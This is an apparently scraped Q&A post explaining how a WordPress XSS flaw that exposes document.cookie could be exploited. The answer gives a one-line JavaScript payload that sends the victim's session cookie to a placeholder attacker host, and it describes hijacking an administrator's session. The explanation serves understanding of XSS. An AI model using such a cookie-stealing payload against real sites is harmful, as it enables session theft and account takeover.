security - Wordpress XSS vulnerabilty (grabbing PHPSESSID) -


i started study vulnerability of websites , i've got doubt wordpress's xss vulnerability. exploit, attacker can grab phpsessid simple javascript's command:

(alert(document.cookie)) 

how can attacker use this? serious security problem or not?

an alert(…) proof of concept demonstrates successful exploitation of xss vulnerability. not used in actual attack doesn’t give attacker benefit.

in real attack, attacker try value of document.cookie somehow. simple example use javascript forge simple http request contains value of document.cookie this:

new image().src="http://evil.example/?"+document.cookie 

this creates image attacker’s url image source has cookie appended it.

with victim’s cookie, attacker may able hijack victim’s session , use wordpress same privileges victim. in case victim administrator, attacker have access administrative functions.


Comments

Popular posts from this blog

c++ - Function signature as a function template parameter -

algorithm - What are some ways to combine a number of (potentially incompatible) sorted sub-sets of a total set into a (partial) ordering of the total set? -

How to call a javascript function after the page loads with a chrome extension? -